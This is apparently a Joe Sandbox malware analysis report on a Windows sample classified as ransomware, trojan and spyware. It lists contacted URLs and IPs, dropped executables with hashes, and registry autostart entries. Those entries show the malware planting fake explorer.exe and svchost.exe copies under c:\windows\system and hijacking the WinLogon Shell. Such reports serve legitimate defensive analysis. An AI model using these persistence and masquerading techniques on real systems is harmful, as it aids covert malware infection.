00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://zxq.net/reasons-to-hire-a-truck-accident-attorney/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-300x169.jpegwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://%s.xboxlive.comsvchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        low
                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-150x84.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-150x84.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/How-To--768x457.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://zxq.net/wp-includes/js/jquery/jquery.min.js?ver=3.6.0explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-30what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://zxq.net/what-happened-to-the-old-zxq-website/nexplorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://zxq.net/wp-json/wp/v2/pages/187explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IP | Domain | Country | ASN | ASN Name | Malicious
                                                                              104.18.114.97 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                              142.250.145.82 | googlecode.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
                                                                              51.81.194.202 | zxq.net | United States | 16276 | OVHFR | true
                                                                              IP
                                                                              192.168.2.1
                                                                              127.0.0.1
                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                              Analysis ID:679096
                                                                              Start date and time:2022-08-05 09:07:53 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 11m 10s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:Lg3gn9y1Cj.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:58
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.rans.troj.spyw.evad.winEXE@144/20@13/5
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 1.9% (good quality ratio 0%)
                                                                              • Quality average: 0%
                                                                              • Quality standard deviation: 0%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 22
                                                                              • Number of non-executed functions: 100
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe
                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 40.125.122.176, 52.242.101.226, 20.238.103.94, 20.223.24.244, 20.54.89.106
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                              • Not all processes were analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              Time | Type | Description
                                                                              09:09:09 | API Interceptor | 1028x Sleep call for process: lg3gn9y1cj.exe modified
                                                                              09:09:16 | API Interceptor | 1x Sleep call for process: AppLaunch.exe modified
                                                                              09:09:18 | API Interceptor | 71x Sleep call for process: svchost.exe modified
                                                                              09:09:18 | API Interceptor | 361x Sleep call for process: explorer.exe modified
                                                                              09:09:23 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\system\explorer.exe RO
                                                                              09:09:33 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\system\svchost.exe RO
                                                                              09:09:52 | Autostart | Run: WinLogon Shell C:\Windows\explorer.exe
                                                                              09:10:02 | Autostart | Run: WinLogon Shell c:\windows\system\explorer.exe
Match: C:\Users\user\Desktop\lg3gn9y1cj.exe
Associated Sample Name / URL: m7iukFCY93.exe, Bc90WRHFvI.exe
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8be2707e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):786432
                                                                                  Entropy (8bit):0.25065011526072395
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:jSB2nSB2RSjlK/+mLesOj1J2
                                                                                  MD5:11E0C81B5B977B054CA8AAE5E3D8F3E7
                                                                                  SHA1:DC69821A1AD836A32C2AF4CE58813F4674B10C15
                                                                                  SHA-256:0BDE68B06F915CC417F8F8D16E7C20733BF52656CDA47554BF428D1F0E05417F
                                                                                  SHA-512:CEE6D61EE8EAE9470E6DDA2E94EE2321EFCCBC181C95756E630E1F48EB93E9A1FCB752D20DEAF2886CB0017F756AA4E3AA81EC43D49C183319FEBD42B9256B35
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1036
                                                                                  Entropy (8bit):5.356180291633412
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLasXE4qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84j:MNH2HKXwYHKhQnoPtHoxHhAHKzvKvj
                                                                                  MD5:7F8E631F679DF67A018544E516CF841E
                                                                                  SHA1:02F03B1AB3CF33821236F743139693A61906A72B
                                                                                  SHA-256:1FB2E1F28E4A338CD7E04A147E290E1DD880E83054BB2BA48EF6038EBA0BFACD
                                                                                  SHA-512:4F7FD1AC6D22F8891F77BD3359EB0A536AB8E8A3D064BBAAB6620826F6B9FC8FC18DAB73474DB4806ED9CD1F5652549D7122E1DE8E5741010E7B3BE3F79EBBB7
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral,
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):707
                                                                                  Entropy (8bit):5.162345868595955
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:hYYLszHjgfkbxsjJ7QCdToh50lXQoLYlJl5M6eNsJLi334VlKk:hYYIzDIkejNQCRtgoLY95MI5634Vsk
                                                                                  MD5:1304294C0823CA486542BA408ED761E3
                                                                                  SHA1:B2A70FB2D810CA13985882E6981F33998823E83E
                                                                                  SHA-256:3BBE72F3BAA8EC61DE17A1D767FCA58704769684B7ABE9161D0C4EAF4C8F0982
                                                                                  SHA-512:67430E967118D2B2D8A448C583BDE082BF512DA88EAE75B0501EC5A6C2B0BF46936306317BD3DDD956C5C6E01FE0C7DBED43927588EFBA06C5F84D8A557F7B8B
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />.<title> 301 Moved Permanently..</title></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>.<h2 style="margin-top:20px;font-size: 30px;">Moved Permanently..</h2>.<p>The document has been permanently moved.</p>.</div></div></body></html>.
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                  Category:dropped
                                                                                  Size (bytes):56286
                                                                                  Entropy (8bit):5.402091021498643
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:PyMapcrHsCNwn1d0kelTaGNpSz17sjQRrCjmZIclnlZ+/s:Pq8wnSxdqIclnlZCs
                                                                                  MD5:276F671F15DAEEA9B0A348C035211481
                                                                                  SHA1:0B33726249C5FFEC7A23F44506F533879F46B5AE
                                                                                  SHA-256:380DB9B45C38368CE654C7976EBADA338C026047B020D4924D29B73978399ECE
                                                                                  SHA-512:2502DB102655C3E43A0DD569D2214618676039C3F0BCA37DD9175C2A1B693B76734EDA2E4B51EBE37473B00AF931BB9FFF4DCD9C665485273FBA2CA186102060
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>.<html lang="en-US" class="s-dark site-s-dark">..<head>...<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO Premium plugin v18.0 (Yoast SEO v18.4.1) - https://yoast.com/wordpress/plugins/seo/ -->..<title>What happened to the old ZXQ website? | ZXQ</title><link rel="preload" as="font" href="https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2" type="font/woff2" crossorigin="anonymous" />..<link rel="canonical" href="https://zxq.net/what-happened-to-the-old-zxq-website/" />..<meta property="og:locale" content="en_US" />..<meta property="og:type" content="article" />..<meta property="og:title" content="What happened to the old ZXQ website?" />..<meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website
                                                                                  Process:C:\Users\user\Desktop\Lg3gn9y1Cj.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2645041997918773
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXK/79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQK/JG7ONEipl
                                                                                  MD5:FA2089793F0B8D2F6F7FCF7176CBCA36
                                                                                  SHA1:4AABD7420EBDD7C6AC87389F00594E4AC1F6055E
                                                                                  SHA-256:42C253738A8FFFE1358E50CC260938485BFA45E2A3A7060335F88D0E027CBAC5
                                                                                  SHA-512:739B193990DA2B3C7D089A6D68C818787F082E5BA000E2B71386D4AFC4AD3E88006969E87664215F8722FBB538E9E0FDCB4FBF8FADEB063C16F5570CA80956CA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System\svchost.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.263447848067321
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXxNxlt79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQxNjtJG7ONEipl
                                                                                  MD5:4453DA200C2D970D975190A0F27F6AD0
                                                                                  SHA1:305C9977DACA6FED6D11CCB1117AF3447F53B668
                                                                                  SHA-256:7CEC37BC8E7F81504AF19B87B81052E51306F0A56155E2BD552D66D74643FCBD
                                                                                  SHA-512:1D2B72C0EC734A650A76E4C54E0D274172BFF8819060F45B73DB7C2B9DCF2B9CCB9841B8A0224304C178345C401C5920E138A4E0137A878D956609472C3442DD
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2636074265164334
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQX6xX79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQ6BJG7ONEipl
                                                                                  MD5:6A074302EACA2D20A1F728035FE077F3
                                                                                  SHA1:9E3BB65A8DB04B99A1FD94EC0679BB7E90BCFF2D
                                                                                  SHA-256:8A356A8777248937E29E869CC4F65A6D49CB94636187BF58E06EBD9C8E42D6A7
                                                                                  SHA-512:8ABDF5E901255030F1F653CD2F3B05048CAFD0509BB5E07D7DC846629C086D58B1B4BD875D7A07993D0D601704DF0996EAE46F0BF008A8A0F32C4BAB72C49477
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System\spoolsv.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2645041997918773
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXaEG79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQaEGJG7ONEipl
                                                                                  MD5:8AF929E2C5779CB4C533178AC1588C15
                                                                                  SHA1:124C03AC67CCB0C2B1E05A4A3D7CE9A0E5C7A3C4
                                                                                  SHA-256:D4484A0EDAD4E7738155F7ED0606B112E08B966D9865A95C4E77888A873E9027
                                                                                  SHA-512:33B032EDF0A9A861039A8BB9DEAA92955E6C8DC9400BFD45A7268DE2957BF6559371506C03FDCF14435111870A0DCBC81C21F922F367CDD011B9398E65BAF08E
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System\spoolsv.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2645041997918773
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQX48G79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQ48GJG7ONEipl
                                                                                  MD5:05C56F3D1B7035D139AB304B002C5450
                                                                                  SHA1:14C75C9D3431CEE6E04B03D82492D6CEE54D7A54
                                                                                  SHA-256:D75C59C908DDDB694E6D6AE60D2624FF009CB6DDBEBFE3DB2780B55C44A754F7
                                                                                  SHA-512:0B6EAC857813F0260627F9BAF0FB54D04B813913214B2CF62927576E9FA115D9B376E0E5A7ED1122A4D06842F8D57E5E71F9643239A65ABE8E1184505D70107E
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2606497387666988
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXQB79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQ4JG7ONEipl
                                                                                  MD5:20275BBFE0B1568DCBAF7B5A1047C854
                                                                                  SHA1:47542065C1C5CACD6E27DAC85B43F1B2B9948B70
                                                                                  SHA-256:5AAA1419B554FAB42DA577910EC6B26C1E6C24DFAA458BC56D4AF1AB7B8433E3
                                                                                  SHA-512:E69A1ECDBE0891A50C61AEAE8928149D83518196375F864F919767B78488634CE21CFC07625D8B92BD832CA2ECEF7F8C5ED02320BB857B563E4F263D72DF72B9
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\Lg3gn9y1Cj.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):280890
                                                                                  Entropy (8bit):5.207941587783397
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unB:UvEN2U+T6i5LirrllHy4HUcMQY6M
                                                                                  MD5:4223968DA579570E05813854A134397B
                                                                                  SHA1:07BDAA69105CAE6467337D965EB968B6765FE28E
                                                                                  SHA-256:85CE1F5747CE26ADF8191236668B87796ED45B1E15A9B87FA8A2F3C80B9B65FC
                                                                                  SHA-512:C62411E35DB1940412BF5D8132C1A9A4346EC179B23EC57945BE7EA64C5640850CFFF94B122CA980293653B270A0C968C48E0B27AF0AF0BD5BFE177ED72E6BEB
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Windows\System\svchost.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):280936
                                                                                  Entropy (8bit):5.212744789348709
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unD:UvEN2U+T6i5LirrllHy4HUcMQY6G
                                                                                  MD5:9AE508566C73A6DC1E178CD37C7F5A1F
                                                                                  SHA1:19F8704A4FDEBE841B27522167E0BC2DD1BBD710
                                                                                  SHA-256:354C079A4DEE7FCF3E423075B9938DFE58CC3DEDFE8F574C961D5079D2678CAD
                                                                                  SHA-512:FF450C6664C4C2B87E534C1F1447C931DBF457E588A1B320C5FDC1921EA764704C347CDDEA6FB2433ED5320F5F570846420F52BACED2164508B7E0D993BE83C7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281108
                                                                                  Entropy (8bit):5.226904366194023
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6un7:UvEN2U+T6i5LirrllHy4HUcMQY6y
                                                                                  MD5:CB3A6EA5289DC0011C2E80778923121E
                                                                                  SHA1:BA21DB2ADA4182FB6854BA2AD6CC43617A1EAB64
                                                                                  SHA-256:E1FDBFD8A14848EDB78DDEA2F324D56EAFCC89E80A91B77113A48B1791F8872E
                                                                                  SHA-512:562E152B88FF60325CD7A3D5268523A4124DBF48D737DB8CCCCC090E7E8CF32D8084BA40386501DD3A412065C0C044D52A502CA3EAB6C4C6AE6D3075292DF3AE
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Users\user\Desktop\Lg3gn9y1Cj.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):135168
                                                                                  Entropy (8bit):5.556666529655342
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:MPM/Zws3kTnvzbhNBPmxue2SRQg0dkEwiqoViocIdus3h4b6P/C:MYZTkLfhjFSiO3oeIdlsqC
                                                                                  MD5:BEE47439C4960E2728594ECE9AD95BA7
                                                                                  SHA1:43F4B6F607DEC5BEC2A33E2FB4148C38DE832490
